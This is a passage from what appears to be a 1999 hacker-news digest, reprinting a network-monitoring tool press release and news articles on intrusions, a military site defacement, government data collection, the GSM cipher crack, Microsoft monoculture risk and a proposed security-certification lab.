BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version of TCP.demux, a TCP/IP session reconstruction utility. TCP.demux is the first of a set of tools from Sandstorm Enterprises for advanced network monitoring and surveillance. TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux includes sophisticated and powerful analysis tools for quick identification of relevant sessions. Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed to interfere with network monitoring. TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows 95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris. TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language.
The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder. "The Internet has grown enormously in the past few years, and with it the scale of the problems. TCP.demux is the first tool we know of designed with the scope of today's problems in mind." Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said, after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time." TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at http://www.sandstorm.net/tcpdemux. Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner, the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have decades of experience in security management, software development, research, education, and consulting. Sandstorm is committed to providing trusted, reliable products and excellent technical support. Sandstorm Enterprises is on the web at http://www.sandstorm.net. PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc. Contact: Sandstorm Enterprises, Inc. 
James Van Bokkelen (617) 426-5056 jbvb@sandstorm.net
or
In Washington, DC: Ross Stapleton-Gray rsgray@sandstorm.net
or
sales@sandstorm.net

@HWA

15.0 Youth Charged With $20,000 in Damages
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN http://www.hackernews.com/

contributed by Richard223
The case of a minor from Chesterfield County Mass, made it into a newspaper in Virginia. The youth has been charged with breaking into ACIS/BICNet, according to court documents he caused "the entire system to crash" which resulted in over $20,000 in damage. Evidently the Virginia High Technology Crimes Unit was the investigating office since the suspect used one Virginia system to route his traffic.

Richmond Times Dispatch
http://gatewayva.com/rtd/dailynews/virginiaarch/hack25.shtml

Chesterfield youth pleads guilty to hacking
Friday, June 25, 1999
BY MARK BOWES
Times-Dispatch Staff Writer

A Chesterfield County youth who authorities said is intelligent but committed a foolish act has pleaded guilty to hacking into a Massachusetts Internet provider's system, disabling it and causing at least $20,000 in damage. The 16-year-old, whose identity is being withheld because of his age, pleaded guilty to computer trespassing Monday in Chesterfield Juvenile and Domestic Relations District Court. The judge continued the matter until Aug. 12 so he can decide whether to convict the boy of a felony, as charged, or reduce it to a misdemeanor. Through his attorney, the boy agreed the evidence was sufficient to convict him, "but contested whether or not it was maliciously done," which is required for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney Aubrey M. Davis Jr. "I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by an intelligent kid who didn't really realize the significance of what he was doing. He's a pretty daggone smart kid."
Virginia State Police Special Agent Sal Girgente, who investigated the case here, gave a summary of evidence in court on Monday. According to evidence, the boy, using his mother's Internet account, hacked into the computer network of ACIS/BICNet, an Internet service provider in Ayer, Mass., in August. State police also believe he succeeded in breaking into the computer systems of New Mexico State University and Aurora Communications Exchange Ltd., in Ontario, Canada. Investigators believe he may have hacked into the latter two systems to "cover his tracks" before breaking into the Internet provider's network. The state police's new High Technology Crimes Unit began investigating the case after getting a referral from the FBI's Boston field office. An agent there succeeded in tracking an intruder into the ACIS/BICNet system back through a Virginia Internet provider to the boy's home in Chester. During an intrusion on Aug. 8, police believe the teen and possibly accomplices replaced system files, among other things, created a new account and turned off system logging, according to court documents. That caused the company's e-mail system to be out of service for 12 hours. Several days later, the intruder again broke into the system and succeeded in causing "the entire system to crash," court papers say. The resulting damage, police said, topped $20,000. The teen "succeeded in bringing the system to its knees," Girgente said. Three FBI traces were successful in leading authorities to the Chesterfield family's Internet account. Police believe the boy and other hackers broke into the system to play games or create chat rooms.

© 1999, Richmond Newspapers Inc.

@HWA

16.0 Army Fights Online Battle And Loses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Space Rogue
Early Monday morning one of the four web servers for the US Army came under attack.
The web page poked at the FBI and their recent raids of the members of the group gH. www4.army.mil was quickly noticed as being defaced and was restored by 6am. It is believed that the attackers used a highly publicized exploit for Cold Fusion, an exploit for which a patch has been available for weeks. (Hmmmmm, maybe I should reenlist and help them out?)

HNN Cracked Pages Archive - Be sure to read the html comments.
http://www.hackernews.com/archive/crackarch.html

CNN
http://www.cnn.com/TECH/computing/9906/28/AM-ArmyHacked.ap/

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/590787l.htm

APB Online
http://www.apbonline.com/911/1999/06/28/hack0628_01.html

MSNBC
http://www.msnbc.com/news/284765.asp

Nando Times
http://www.techserver.com/story/body/0,1634,65142-103297-733898-0,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2285307,00.html

CNN;

Hackers attack Army's main Internet site
June 28, 1999
Web posted at: 7:37 PM EDT (2337 GMT)

WASHINGTON (AP) -- Computer hackers defaced the Army's main Web site in the latest digital attack on a federal system. Pentagon workers noticed it early Monday and repaired it. Army spokesman Jim Stueve said administrators believe hackers altered the www.army.mil site between 8 p.m. Sunday and 5 a.m. Monday, but no internal systems were affected. "There were no security breaches," he said. The altered site announced the attack "has a purpose ... to settle rumors" about the demise of the loosely organized hacker group that claimed responsibility for the May attack on the White House Web site. Another message hidden within the altered page's computer code urged people who saw it to "trust very few people." Stueve said he noticed the defaced page when he arrived for work Monday morning. It was replaced by 6 a.m. "I just looked at it and just went on to my favorites (other sites) and blew it off because I knew they were going to get to it right away," he said.
The attack comes in the wake of several others on prominent government Internet sites, including those of the White House, FBI and Senate. Military pages have long been favorites of hackers. "They're always the target," said Keith Rhodes, a director in the information management division in the General Accounting Office, the investigative branch of Congress. "It's almost like a rite of passage. You have to bust a (military) site to have any credibility." Just last week, experts told the House Science Committee's technology panel that managers at many federal agencies fail to consider computer security adequately and have too few employees with sufficient training. Rhodes, who was among those testifying last week, said Monday that the Defense Department's computer-security expertise is uneven. "They're the best and the worst in computer security," Rhodes said. "They've got some real pros, some of the best in the business. But the DOD is huge ... and some of the areas in the Department of Defense don't have very good security." Outside security experts said they believed the Army site's attackers used a relatively well publicized security loophole in the popular Cold Fusion software package. The Army said only that the incident was under investigation. "The community of attackers is getting better at what they do, and a lot of their tools are getting automated," Rhodes said. "And a lot of the software being sent out is getting worse -- designed for flash with security as an afterthought. You put up your Web site, and it gets creamed."

@HWA

17.0 Welfare Reform Law Invades Privacy of US Citizens
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Weld Pond
The Personal Responsibility and Work Opportunity Reconciliation Act of 1996 was primarily passed to reform the welfare system in the United States.
One of the little known provisions of this law is that employers must report all new hires and salary changes to the government on a quarterly basis, this information eventually makes its way to the Administration for Children and Families. Starting next month the program will require banks to search for accounts on people determined to be delinquent on their child-support payments. (Ed Note: This is an eye opening article and is recommended. It is long and the good stuff is at the bottom.) The Charlotte Observer http://www.charlotte.com/click/wiretech/pub/009020.htm Posted at 7:45 p.m. EDT Saturday, June 26, 1999 Huge new electronic `dragnet' assailed by privacy advocates By ROBERT O'HARROW JR. The Washington Post WASHINGTON -- As part of a new and aggressive effort to track down parents who owe child support, the federal government has created a vast computerized data-monitoring system that includes all individuals with new jobs and the names, addresses, Social Security numbers and wages of nearly every working adult in the United States. Government agencies have long gathered personal information for specific reasons, such as collecting taxes. But never before have federal officials had the legal authority and technological ability to locate so many Americans found to be delinquent parents -- or such potential to keep tabs on Americans accused of nothing. The system was established under a little-known part of the law overhauling welfare three years ago. It calls for all employers to quickly file reports on every person they hire and, quarterly, the wages of every worker. States regularly must report all people seeking unemployment benefits and all child-support cases. Starting next month, the system will reach further. 
Large banks and other financial institutions will be obligated to search for data about delinquent parents by name on behalf of the government, providing authorities with details about bank accounts, money-market mutual funds and other holdings of those parents. State officials, meanwhile, have sharply expanded the use of Social Security numbers. Congress ordered the officials to obtain the nine-digit numbers when issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to revoke the licenses of delinquents. Enforcement officials say the coupling of computer technology with details about individuals' employment and financial holdings will give them an unparalleled ability to identify and locate parents who owe child support and, when necessary, withhold money from their paychecks or freeze their financial assets. ``They never get away from us anymore. It's just wonderful. . . . What you're trying to do in child support is build a box, four walls, around a person,'' said Brian Shea, the acting executive director of child-support enforcement in Maryland. ``It has in some ways revolutionized this business.'' But privacy experts and civil libertarians say the scope of the effort raises new questions about the proper line between aggressive public policy and intrusive government snooping. In pursuing an objective that is almost universally applauded, the government has also created something that many Americans have staunchly opposed: a vast pool of fresh personal information that could be used in a variety of ways to monitor their lives. ``What you have here is a compilation of information that is much better and more current than any other data system in the U.S.,'' said Robert Gellman, an attorney and privacy specialist in Washington, D.C. 
``All of the sudden we're on the verge of creating the Holy Grail of data collection, a central file on every American.'' Already lawmakers, federal agencies and the White House have considered expanding the permitted aims of the system to include pinpointing debtors, such as students who default on government loans. Under the system, every employer must send information about new hires and quarterly wages to state child-support agencies. State officials gather the data, along with information on unemployment benefits and child-support cases, and then ship it to computers run by the Administration for Children and Families. ACF officials then use computers to sort and send back to state authorities reports about people obligated to pay child support. Government officials say the system is safe, accurate and discreet. They also say it is secure. Because it has, among other safeguards, systems that confirm the accuracy of Social Security numbers, officials say it will not intrude into the lives of most people. An examination of the program, however, shows that government officials have downplayed or overlooked a variety of privacy and security concerns as they worked to meet congressional deadlines. The computer system that houses much of the data at the Social Security Administration ``has known weaknesses in the security of its information systems,'' according to a Dec. 31 report by the General Accounting Office. And authorities have not studied the frequency of mistakes that might arise from incorrect data, even though the system will enable local child-support enforcement officials to routinely freeze a parent's assets without an additional court hearing. Few people know about the system, even though it was created through one of the signature acts of Congress and the Clinton administration -- the ``Personal Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that ended the federal guarantee of welfare payments. 
Much of the congressional debate and news coverage at the time focused on the broad policy and political implications of the new law. Officials have not publicized their ability to obtain financial information because they do not want to alert delinquents to the ability of enforcement workers to seize or freeze financial assets, according to Michael Kharfen, spokesman for the federal Administration for Children and Families, which administers the program.

-0-

When welfare reformers on Capitol Hill and the White House approved the system in 1996, their aim was to cut down welfare spending by boosting child-support payments.

(Begin Optional Trim)

They had in mind people such as Stephanie Dudley and her son, Robert, who live in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy was born and drifted from place to place. He owed $350 a month in child-support payments, but it was hard tracking him down and getting him to pay. Officials found Robert's father -- and then started withholding money from his paycheck -- after a new employer in Pennsylvania reported him to the network. ``I literally was living from check to check,'' Dudley said. ``I mean, that money literally put shoes on the kids' feet, helped pay the rent.'' Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received court-ordered child support until the system turned up his father in North Carolina. Now she gets about $120 a month, money she plans to use to pay for a babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was getting before, which was nothing.'' Child-support advocates contend that fears about privacy are overblown when weighed against such successes.

(End Optional Trim)

As of 1997, the latest year for which figures are available, more than 7.4 million delinquents owed more than $43 billion in past child support. The system has helped boost support payments from $12 billion in 1996 to $14.4 billion last year, officials said.
And in 1997, the burgeoning system helped enforcement programs locate more than 1.2 million delinquents. The system is essentially an electronic dragnet. It collects the names, Social Security numbers and other data about every newly hired employee in the nation from employers, who also must provide pay reports for most wage-earning adults. States ship along the names and other identifying information of people who receive state unemployment insurance. The Administration for Children and Families, a part of the Department of Health and Human Services, serves as a sort of clearinghouse that automatically matches all of that information against a file of nearly 12 million child support cases to locate parents obligated to pay support. Then the agency provides information about those parents -- no matter whether they are behind on payments -- to the appropriate state enforcement workers. The idea is to track the parents across state lines. Supporters of the system note that Congress explicitly restricted access to it. Those authorized to use the information include the Social Security Administration, which can use the directory of new hires to verify unemployment reports; the Treasury Department, which can use it to cross-reference tax-deduction claims; and researchers, who gain access only to anonymous data. Next month, financial institutions that operate in multiple states will begin comparing a list of more than 3 million known delinquents against their customer accounts. Under federal law, the institutions are obligated to return the names, Social Security numbers and account details of delinquents they turn up. The Administration for Children and Families will then forward that financial information to the appropriate states. For security reasons, Kharfen said, the agency will not mix the financial data with information about new hires, wages and the like. Bank account information will be deleted after 90 days. 
In a test run this spring, Wells Fargo identified 72,000 customers whom states have identified as delinquents. NationsBank found 74,000 alleged delinquents in its test. (Begin Optional Trim) Civil liberties activists say it would be a mistake to consider the system solely in terms of finding bad parents and making them pay up. They worry that the network sets a new standard for data surveillance by using computers to cross-reference hundreds of millions of personal records about Americans. Over the past quarter-century, since the Privacy Act was enacted in 1974, the federal government has tried to place limits on how its officials could compare databases to find or profile people. And in general, the government was supposed to limit data collection about people who paid taxes, received a federal benefit, served in the military or tangled with the judicial system. Critics say this new effort leaps beyond those practices by systematically creating centralized files about workers, wages and families, and sifting through those files to find a relatively small number of suspected deadbeats. The new registry of child-support cases, for example, now requires the names of all parents and children involved, even if they do not receive public assistance or ask for help in getting a problem resolved. The registry has information about nearly 12 million families. There is also concern about the government's reliance on private employers and financial institutions to watch citizens. A proposal last year to require banks to routinely track customer transactions for signs of criminal activity prompted an outpouring of protest. Regulators ditched the plan, called Know Your Customer, this spring after acknowledging they had misstepped. Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria, Va., said he doesn't believe banks should be asked to watch their customers so closely on behalf of the government. ``We're all good citizens. 
But it doesn't mean we spy on our neighbors,'' Burke said. ``It's really scary.'' A review of the swift development of the system has turned up still other questions about whether the government paid enough attention to privacy -- particularly at a time when the issue has become a flash point in public policy debates across the country. As the system was phased in, officials posted federally required notices only in the Federal Register. No additional information has been added to W-4 forms that people must fill out when taking a new job. In addition to the issues raised by the GAO about the security of computer systems gathering and transmitting personal information, the systems in about a dozen states also have not been certified by federal officials as meeting security and privacy guidelines. Officials in OMB and the Administration for Children and Families sought to allay fears about mistakes. While acknowledging they have no idea about the likely rate of errors because no study was conducted, officials said the program verifies the accuracy of any Social Security numbers before sending data along to the states. In addition, officials said, individuals in every state will have an opportunity to appeal administrative actions. Virginia, for instance, will give parents up to 10 days before seizing assets, a state official said. Critics wonder what might happen to someone who is away on vacation or business. ``A Social Security number is not a bullet-proof identifier. There are always going to be mistakes,'' said Mary J. Culnan, a business professor at Georgetown University's McDonough School of Business, who drew an analogy to problems with the accuracy of credit reports in the early 1990s. Finally, the operation appears to be at odds with the Clinton administration's recent push to make privacy a priority. Last month, Clinton called on banks and other financial institutions to give consumers more control over how their information is gathered and used. 
``President Clinton believes that consumers deserve notice and choice about the use of their personal information,'' said a White House memo about the event. (End Optional Trim) The assurances of officials do little to assuage the fears of people who worry about the potential ills of having a government that closely monitors its citizens. Such anxieties have been underscored by mistakes child-support enforcement workers have made in recent years. Last year, officials in Virginia had to apologize to 2,300 parents for misidentifying them as delinquent and announcing they would lose their hunting and fishing licenses. Officials attributed the mistake to a computer programming error. ``We're not perfect,'' a state official said at the time. California officials also misidentified hundreds of men after the state began the federally mandated, data-driven crackdown on deadbeats. In some cases, they confused men who had similar names. ``In my estimation, this is going to be nothing more than a huge invasion of privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing license because he refused to provide his Social Security number. AP-NY-06-26-99 1916EDT

@HWA

18.0 GSM Mobile Security is Cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Weld Pond

The A5/1 over-the-air voice privacy algorithm used by almost all GSM digital phones is no longer secure. A5/1 is the algorithm used by GSM phones to encrypt communications. It is theorized that software to decrypt captured conversations will be available within a year. The COMP128 algorithm used to authenticate GSM phones for network access was cracked last year.

The Australian
http://technology.news.com.au/techno/4221778.htm

GSM mobile security is cracked
By DAN TEBBUTT
22jun99

DIGITAL mobile phone users could soon face the threat of eavesdropping, following a breakthrough reverse engineering effort in the United States.
Three California researchers say they have cloned the secret encryption method used to secure Global System for Mobile (GSM) communications. Research leader Marc Briceno predicted unscrambling software could appear before the end of the year, following academic papers studying possible faults in the A5/1 over-the-air voice privacy algorithm. This standard is used in nearly all digital mobile phones in Australia. Inherent flaws in the security technology suggested special cracking hardware devices could unscramble GSM conversations within seconds, according to Mr Briceno, director of the US-based Smartcard Developers Association. A network of personal computers could unlock the encryption method within a matter of hours. "Mobile users should be worried about this," he said. "Calls can be intercepted by a moderately motivated adversary who by no means needs to be a cryptography expert. "The telecommunications providers' promise that GSM is secure with respect to random listeners can certainly no longer be maintained." The reverse engineering project would allow greater public scrutiny over closely guarded GSM security technologies, he said. The reference implementation would allow academic cryptographers to probe for deficiencies in A5/1. "Once the holes are found, any competent programmer can write an implementation to exploit those shortcomings." Vodafone technical director Jonathan Withers warned against over-stating theoretical problems. "Practical attacks are pretty hard," he said. But Mr Withers confirmed that GSM security standards were watered down after concerns were raised by law enforcement agencies. "A5/1 is set at a level that is deemed appropriate and acceptable by law enforcement," he said. Telstra and Optus representatives declined to comment. Australian Communications Authority standards and compliance manager Grant Symons defended digital security as adequate for the job.
"The GSM algorithm has proven its worth for people engaged in everyday business and social activities. We're not talking about the military here," he said. Mr Briceno said the synthesised algorithm was so functionally similar to the real A5/1 code that it could complete published GSM encryption benchmarks. Last year he was part of a University of California, Berkeley, team that broke the COMP128 algorithm used to authenticate GSM phones for network access – prompting fears of billing fraud on digital mobile phones. "In a business environment, where people believe their call is secure, the cost of eavesdropping could be a lot more than a few dollars on a phone bill," Mr Briceno said.

@HWA

19.0 Microsoft Mono-culture Poses National Security Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN http://www.hackernews.com/

contributed by Adam

This article asks the right question "Is Microsoft a threat to national security?" but misses a few key points. The threat is worse than this article says. Remember Melissa made it on board a Navy ship and jumped the supposed air-gap onto SIPRNet, two things that could not have happened if the military was not dependent on one company's products. The article talks about a CyberUL type of organization, this idea has been around for a while and was first proposed by Tan. Oh, and the part of a Mac being unhackable, don't believe it.

Forbes
http://www.forbes.com/penenberg/

CyberUL Proposal- By Tan
http://www.l0pht.com/cyberul.html

HNN Archive for March 31, 1999- Melissa on board 7th Fleet
http://www.hackernews.com/arch.html?033199#3

HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet
http://www.hackernews.com/arch.html?040599#2

Forbes;

Is Microsoft a threat to national security?

IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart ship," was conducting routine maneuvers off Cape Charles, Va.
Things were fine until the onboard computer system, powered by Microsoft NT software, crashed, leaving the ship dead in the water for 2 hours and 45 minutes. Communications were knocked out. Weapons systems were down. The propulsion system wouldn't restart. If you think rebooting your laptop after it freezes is a drag, how would you like to try and reboot an entire battle cruiser? Was it sabotage or an electromagnetic pulse? Nothing so dramatic: The computer was simply asked to divide by zero. Officials were quick to exonerate Microsoft for the glitch, claiming it was human error, and the Navy continues to install Windows NT servers on all its cruisers and destroyers, some 84 ships in all. Perhaps Navy brass haven't heard the joke making the rounds in military computer circles: What does NT stand for? Needs towing. The question is, What would have happened if this had occurred in battle? Of course, the Navy should modernize its fleet, incorporating the best computer technology this nation's geeks can create within the fabric of its ships. Should the Navy rely on Microsoft products, which have proved to be unstable, unreliable, hard to troubleshoot and riddled with security holes? It is ironic that as one part of the U.S. government goes after Microsoft in court, accusing it of monopolistic practices, Microsoft is quietly gaining a monopoly over another part. Hackers--and now virus makers--have long delighted in taunting the "Satan from Redmond," churning out software programs that exploit holes in Microsoft products. Some of them have deliciously crude names, too, like Back Orifice, a software program originally created by a group called The Cult of the Dead Cow. Because Back Orifice enables a user to control and monitor a Windows operating system over a network without being detected, it is on just about every good hacker's laptop. It is easy to find--type it into almost any search engine and you'll encounter lists of sites that offer it as a free download. 
What is particularly distressing is the emergence of the Microsoft mono-technology culture, in which its many products are tightly bundled together--Windows OS plus Microsoft Excel plus Microsoft Word plus Microsoft Outlook E-mail could very well equal big trouble. As Microsoft's dominance grows, Microsoft users become even more vulnerable. Case in point: In March, the Melissa virus swept America, spreading when a user opened an attached Microsoft Word file. Upon activation, it looked for Outlook--Microsoft's E-mail, newsreader and personal information manager--created a message, and sent it to the first 50 people listed in the user's address book. Thankfully, the virus did not destroy or alter data, or trash hard drives, but it did flood networks with E-mail. This was not true of "Explore.exe," an Internet worm named for the file that launches it. In June, Explore.exe erased billions of gigs of information around the world. Melissa and Explore.exe received wide coverage in the media, but you may not have heard of the most recent Microsoft security hole in Microsoft's Internet Information Server, which, according to eEye Digital Security Team, left approximately 90% of 1.3 million Microsoft web servers vulnerable to hack attacks. It seems that as soon as Microsoft develops a patch to combat a new exploit, someone comes up with a new one. By the time you read this column, I wouldn't doubt that more holes will be identified and plugged. "No one knows what evil lurks in these 40 million lines of Windows NT code," says Rick Forno, author of The Art of Information Warfare. "You have to roll the dice and take your chances." His solution: Buy a Mac. They are virtually unhackable, he says. And he's not kidding. But Forno, who truly believes that Microsoft is a threat to our nation's security, has other ideas, too. 
He proposes a kind of software version of the Underwriters Laboratory, a not-for-profit product safety testing group for electronics that has been around since 1894. It is responsible for the "UL-approved" stickers you see on lamps, Christmas tree lights and clock radios. As for me, I'd like to change the model by which software companies peddle their products. Instead of allowing them to license software, which lets them dodge responsibility for poor quality, software vendors should be held liable for glitches that lead to security snafus and crashes. If you bought a car with locks on the door that didn't work properly, odds are the manufacturer would be held liable. So should software makers. In addition, the government, and corporations, could lessen the impact of the next round of Melissa viruses or Explore.exe worms by relying on more than one operating system. The less we depend on one type of operating system, the less vulnerable we are. Of course, this runs smack into Bill Gates' monopolistic vision: to place Windows on every computer, PDA, Navy ship and toaster. But Gates is only the richest man in the world, not the only software vendor in town. And that's how he should be treated. Do you think heavy reliance on Microsoft products threatens our national security? Let me know in my forum.

Related links:

The Art of Information Warfare http://www.taoiw.org
Underwriters Laboratory http://www.ul.com

CyberUL Proposal- By Tan (Reprint)

Cyberspace Underwriters Laboratories
tan@l0pht.com

Cyberspace Underwriters Laboratories - 01/11/1999

Underwriters Laboratory

Underwriters Laboratories was founded in 1894 by an electrical inspector from Boston, William Henry Merrill. In 1893, Chicago authorities grew concerned over the public safety due to the proliferation of untamed DC circuits and the new, even more dangerous technology of AC circuits.
These new and little-understood technologies threatened our society with frequent fires which caused critics to question if the technology could ever be harnessed safely. Merrill was called in and set up a one-room laboratory with $350.00 in electrical test equipment and published his first report on March 24, 1894. Back in Boston, insurance underwriters rejected Merrill's plans for a non-biased testing facility for certification of electrical devices. Chicago however, embraced the idea. Merrill took advantage of the situation in Chicago to get up and running and within months had support at the national level. Today, UL has tested over 12,500 products world-wide and is an internationally recognized authority on safety and technology. The UL mark of approval has come to provide an earned level of trust between customers and manufacturers and safely allowed our society to leverage hundreds of inventions that would have otherwise been unfit for public use. While originally targeting inventions which could potentially cause physical harm to the user, the UL has expanded into the listing of alarm system products as well as alarm system installers. Individual products are listed as meeting UL standards and the companies that install those products are also listed as qualified to install the product as intended. Insurance companies have leveraged the UL's scrutiny to properly ascertain their risks.

Cyberspace

Today, technology continues to grow at a rapid pace, perhaps even out of control. The commercialization of the Internet has led many businesses to offer services out there in what has been called the Wild Wild West (WWW). As a result, the public safety is at risk. Utilities are bridging control systems to Internet attached back-office systems. Banks are offering 'cyber-banking' and merchants are collecting information about consumers as they transact their business over the Web.
Individual privacy and the fiduciary trust banks and merchants have established over hundreds of years are open to new threats as these activities become more and more prevalent. Similarly to early electrical inventions, today's computer security products may introduce more harm than good when implemented by end users. While some of these products do what they claim, most do not. The lack of standards and meaningful certification has allowed the sale of products that are either intentionally or unintentionally snake-oil. While many of the products may solve old problems and inadvertently introduce worse ones, some just do not perform as advertised at all. For instance, some products have been marketed as utilizing the latest and greatest encryption mechanisms when in fact, the version they are selling does not utilize any encryption at all. Just as in the late 1800's, the consumers have little understanding of the inventions they are purchasing. They are presented with claims by the product's marketers and have no way of proving those claims to be true or false. Just as it was back then, this has not stopped the large-scale application of these inventions, regardless of public safety. In the late 1900's, nobody has stepped up to the plate to expand the UL's role into computer security products or to take that role as their own. To some extent, groups like Nomad Mobile Research Center and L0pht Heavy Industries have acted as modern day Merrills, publishing non-biased findings to this effect. This is not to say that certification of computer security products has not been attempted in the past. ICSA for instance, operates a certification program for products. CISSP and other organizations also offer certification of information security professionals. These organizations however, have failed drastically at providing what the UL has provided on a more general 'technology' level.
These failures could be examined in detail but such an exercise is outside the scope of this article. The bottom line for ICSA is that it does not have the rigorous standards that the UL has and its credibility has suffered as a result. ICSA fails to see the certification process as ongoing or cyclical allowing for products to inherit their 'certification'. As a result, it is believed by some that there is a problem in that there is a lack of non-biased inspection of software and that money buys more certifications than good product design and implementation. CISSP certifies individuals in the computer security industry. While sorting out those who are fluent in the industry jargon and concept, the work of CISSP's still lacks accountability in that their certification is tied to a test rather than what the UL refers to as a 'field counter-check'. Like most computer certifications however, this is simply a test of test-taking skills rather than a test of experience and understanding.

Cyber-UL

Product certification needs to be performed on every version of a product. Small changes that could ripple through traditional technologies causing safety problems are at least ten fold when applied to computer software. Many similarities may be drawn between the certification of computer security products and the listing of alarm systems and components that UL performs today. UL has a stringent set of tests which are performed on physical security systems which seek UL listing. For instance, safes and vaults have a number of different labels which indicate their adherence to different standards. UL utilizes 'young hotshot' safe-crackers wishing to make a name for themselves, to do the actual testing. This way, specialists are motivated (by not only fame but by financial compensation as well) to validate the claims that the vendors' marketing people want to make.
The entire safe and vault business operates around these ratings to communicate to the customer what it is that the product was designed to do. Based on value and risk, a customer may choose to spend more or less on higher or lower rated labels. The two major factors which influence the level of rating are time and tools. The 'hotshot' safe-crackers are given samples of the product and guidelines for their attempts to defeat its security. For instance, a TL-30 rating means that the cracker is limited to tools not including torches or explosives and is given 30 minutes of actual working time to defeat the security. If X6 is appended to the rating, the rating applies to not only the door, but the container (the rest of the safe). This aligns the vendor's claims to the actual performance of the product. Also, if a new version of the safe comes out, it does not inherit the old version's listing, it must be re-listed. This addresses a big problem that was sure to arise with safe vendors and has definitely risen in the computer security arena. Customers, due to human nature, want products to be certified as 'secure'. Just as customers like to hear promises of security, vendors love to make them. In 1913, UL tested the first 'security devices'. With this expansion into security devices, they recognized the need to replace the word 'Approved' with the words 'Inspected' or 'Listed'. Due to what UL has established with security devices, customers are not lulled into a false sense of security and vendors do not make outrageous claims. Customers are presented with 'product x is rated at rating y' rather than 'its ICSA certified'. Vendors claim to be resistant to certain toolsets for certain amounts of time. This is not what the computer security field looks like today, but is where it needs to go. The manufacturer and consumer must realize that testing 'security' is not the same as testing 'functionality' and because of that, claims need to be adjusted to fit reality. 
If a door-knob opens a door, the door works. If a safe-lock opens when you dial the combination, it does not mean the safe works. You can however, perform tests on the safe to assure that it operates as advertised within certain heat and force constraints. While listing individual devices as meeting UL standards is useful to a security professional or consumer, it is only a small part of the picture. Installation and configuration of components is critical to the actual effectiveness of the security solution. For this reason, installation of alarm systems is another area of influence for the UL. This may seem like a daunting task since the number of implementations is exponential to the number of products. UL has, with only about 4,000 employees, listed more than 12,500 products in over 40 countries and developed over 600 standards for product safety. The tack taken to assure the correct installation of alarm systems has been to list alarm installation companies. Systems installed by UL listed companies may qualify for a UL issued certificate. The certificate registers the customer's alarm system, which becomes an eligible candidate for 'field counter-checks' (spot-audits) which are performed to assure that listed installers are not cutting corners. If a system which has received a certificate fails the field counter-check, the installer could potentially lose their UL listing. The UL has maintained a quality program by scaling the number of field counter-checks as needed.

Problems with the model

While the UL model for security devices seems to address many of the same issues that surround Cyberspace, there are a number of problems with deploying the model for computer security devices as it stands. The first problem is that if a security system is defeated in the physical world, it is typically very obvious to those who come into work on Monday and see that the money is gone and the safe is in pieces.
